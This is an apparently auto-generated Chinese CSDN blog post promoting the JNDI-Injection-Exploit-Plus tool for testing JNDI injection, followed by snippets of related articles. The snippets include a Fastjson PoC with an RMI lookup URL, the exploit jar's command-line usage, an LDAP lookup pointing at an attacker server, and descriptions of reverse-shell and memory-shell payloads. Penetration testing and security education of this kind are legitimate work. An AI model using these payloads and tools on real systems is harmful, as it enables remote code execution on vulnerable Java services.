JNDI注入攻击工具JNDI-Injection-Exploit-Plus:深度解析与应用指南

最新推荐文章于 2024-09-17 07:00:00 发布
最新推荐文章于 2024-09-17 07:00:00 发布
阅读量904 收藏 3
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00020/article/details/137861164
版权

JNDI注入攻击工具JNDI-Injection-Exploit-Plus:深度解析与应用指南

项目地址:https://gitcode.com/gh_mirrors/jn/JNDI-Injection-Exploit-Plus

是一个由CCKuailong开发的开源项目,它专注于Java Naming and Directory Interface (JNDI) 注入漏洞的利用和测试。通过此项目,开发者、安全研究员及渗透测试员可以更深入地理解和应对这种常见的安全威胁。

项目简介

JNDI是一个Java API,用于在分布式环境中查找和管理资源,如对象、服务等。然而,JNDI也可能成为恶意攻击者的目标,因为不安全的JNDI引用可能导致远程代码执行(RCE)。JNDI-Injection-Exploit-Plus提供了一套完整的工具集,允许用户模拟和测试这些攻击场景,以评估系统安全并实施相应的防御措施。

技术分析

该项目主要包含以下几个核心部分:

  1. Payload生成器 - 支持多种类型(例如,RMI、LDAP)的JNDI注入payload生成,以便于测试目标系统的弱点。
  2. 服务器模拟器 - 模拟了RMI和LDAP服务器,可以在本地或远程环境运行,接收并执行注入的payload。
  3. 利用示例 - 提供了各种利用JNDI注入的代码片段,涵盖了不同类型的攻击方式。
  4. 文档 - 详尽的说明文件解释了每个功能的工作原理和如何使用。

应用场景

  • 安全审计 - 在你的应用程序中查找潜在的JNDI注入漏洞,确保系统的安全性。
  • 渗透测试 - 在客户或内部系统的安全性测试中,使用此工具进行实战演练。
  • 教育研究 - 学习JNDI注入概念,理解其工作原理,并了解如何防止这类攻击。

特点

  1. 易用性 - 项目提供了清晰的命令行接口和详细的文档,使得操作简单直观。
  2. 全面性 - 覆盖了JNDI注入的多个方面,包括payload生成、服务器模拟和多种利用方式。
  3. 灵活性 - 支持自定义payload和配置选项,适应不同的测试需求。
  4. 开源社区 - 开源项目意味着持续更新和支持,同时也鼓励社区成员贡献和改进。

结论

JNDI-Injection-Exploit-Plus是理解和对抗JNDI注入攻击的一个强大工具,无论你是开发者、测试员还是安全研究人员,都能从中受益。通过实际操作和学习,你可以增强对这种常见攻击模式的理解,从而更好地保护你的系统免受威胁。现在就探索,开始你的JNDI注入之旅吧!

JNDI-Injection-Exploit-Plus 80+ Gadgets(30 More than ysoserial). JNDI-Injection-Exploit-Plus is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. 项目地址: https://gitcode.com/gh_mirrors/jn/JNDI-Injection-Exploit-Plus

使用JNDIExploit-1.2-SNAPSHOT.jar复现log4j2详细流程
m0_74196038的博客
03-19 1591
还有就是之所以这个实验做了两次,就是因为在这个实验当中,我第一次做的时候,由于这个复现是使用那个脚本,所以直接使用命令去开启http服务和ldap服务 ,但是我发现开启了http服务,但是没法访问到,我以为是环境的问题,就打算第二天再做。结果第二天还是不行,后来终于搞明白了,他这里使用工具开启http服务的指令,实际上并没有真正的开启http服务,只是做了一个端口监听,让靶机误以为开启了ldap服务和http服务。-i 指定开启服务的ip,也就是攻击者的ip,也可以是黑客的公网服务器。
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
Fastjson反序列化漏洞——JNDI注入
最新发布
2301_79096184的博客
09-17 1846
JNDI注入
java asm jndi_GitHub - superroshan/JNDI: JNDI 注入利用工具
weixin_28929351的博客
02-13 240
JNDI 注入利用工具介绍本项目为 JNDI 注入利用工具,生成 JNDI 连接并启动后端相关服务,可用于 Fastjson、Jackson 等相关漏洞的验证。本项目是基于 welk1n 的 JNDI-Injection-Exploit,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。本项目为学习性项目,目前本人 Java 水平依然处于 he...
用marshalsec & Jndi注入利用工具JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 2747
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
JNDI注入
Christ1na的博客
11-17 809
JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C ...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
标题"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip"暗示了这是一个关于JNDI注入漏洞的exploit工具包,版本为1.0 SNAPSHOT,可能包含了多个利用示例或攻击代码。"all"可能表示该压缩包包含了所有相关的组件或测试...
jndi-tool JNDI服务利用工具
01-06
JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3924
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
JNDI注入利用工具JNDIExploit v1.1
qq_21039641的博客
07-04 1734
一款用于JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,集成了JDNI注入格式,能够更加方便的开启服务端后直接利用,支持反弹Shell命令执行、直接植入内存shell等,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。
java asm jndi_JNDI-Injection-Exploit
weixin_29066121的博客
02-16 1408
介绍最近把自己之前写的JNDI注入工具改了一下push到了github,地址:github,启动后这个工具开启了三个服务,包括RMI、LDAP以及HTTP服务,然后生成JNDI链接。测试时可以将JNDI链接插入到JNDI注入相关的POC中,如Jackson、Fastjson反序列化漏洞等。三个服务中,RMI和LDAP基于marshalsec中RMIRefServer、LDAPRefServer类修...
探索Java安全新边界:JNDI-Inject-Exploit
gitblog_00011的博客
05-19 372
探索Java安全新边界:JNDI-Inject-Exploit JNDI-Inject-Exploit解决FastJson、Jackson、Log4j2、原生JNDI注入漏洞的高版本JDKBypass利用,探测本地可用反序列化gadget达到命令执行、回显命令执行、内存马注入项目地址:https://gitcode.com/gh_mirrors/jn/JNDI-Inject-Exploit 1、...
JNDI-Injection-Exploit项目介绍
gitblog_00055的博客
03-23 372
JNDI-Injection-Exploit项目介绍 JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https://...
JNDI注入测试工具指南
gitblog_01002的博客
08-08 1118
JNDI注入测试工具指南 JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https://gitcode.com/gh...
JNDI注入辅助工具
热门推荐
打工人日记
01-26 1万+
简介 一、Rogue JNDI 简介 用于JNDI注入攻击的恶意LDAP服务器。 项目地址:https://github.com/veracode-research/rogue-jndi 该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了进行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如: InitialContext.doLookup("ldap://your_server.com:1389/o=reference"); 它
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

周澄诗Flourishing

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值